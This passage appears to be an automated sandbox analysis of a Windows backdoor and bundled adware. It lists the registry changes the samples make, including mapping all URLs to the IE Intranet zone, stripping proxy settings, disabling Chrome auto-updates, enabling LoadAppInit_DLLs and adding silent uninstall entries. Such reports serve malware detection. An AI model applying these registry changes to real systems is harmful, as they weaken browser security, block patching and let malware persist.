[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 57 EE B0 E5 E3 10 EC 02 BE 43 EC 5D 4E C1 7D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{75F9BF4A-AF67-A478-A37B-31D73186D3F3}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1664 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Follow\Follow.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 53 70 89 AC 35 2C E0 D2 72 2C 61 77 C8 5E FE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Follow"
"DisplayName" = "Follow"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"UninstallString" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoModify" = "1"

"NoRepair" = "1"
"ProductName" = "YoUtuBeeAdBlockke"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayName" = "YoUtuBeeAdBlockke"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 2F 19 38 DB C5 53 B7 CA E3 49 4A 7E BC A3 4C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:596 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\HELPDIR]
"(Default)" = "c:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0]
"(Default)" = "JSIELib"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"TyHelpTFUO.exe" = "TyHelpTFUO"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\A7958A1c7b9\temp]
"%original file name%.exe" = "1cae3ce62857807fb52a3fa4bf6a6107"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"GlobalMaxTcpWindowSize" = "16777215"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 7E 28 95 12 E0 26 E7 60 C0 15 E5 45 3F 9D AA"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\TypeLib]
"(Default)" = "{157B1AA6-3E5C-404A-9118-C1D91F537040}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}]
"(Default)" = "ITinyJSObject"

[HKCU\Software\Classes\Interface\{3B3F3AAD-FB97-49FF-BFEE-D22869AC4326}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process TyHelpTFUO.exe:1516 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"Publisher" = "PriceLess"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"DisplayName" = "Support PL 1.1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"
"usr.1" = "mPgPJqqomjlhabcdef"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"iiid" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"414bc593" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoModify" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"

[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.0" = "CypZVWomjlhabcdefA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un /uq"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"
"8b9e4cbc" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"CategoryName" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0c230bcb" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a2e3b941" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Mode" = "4026531840"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
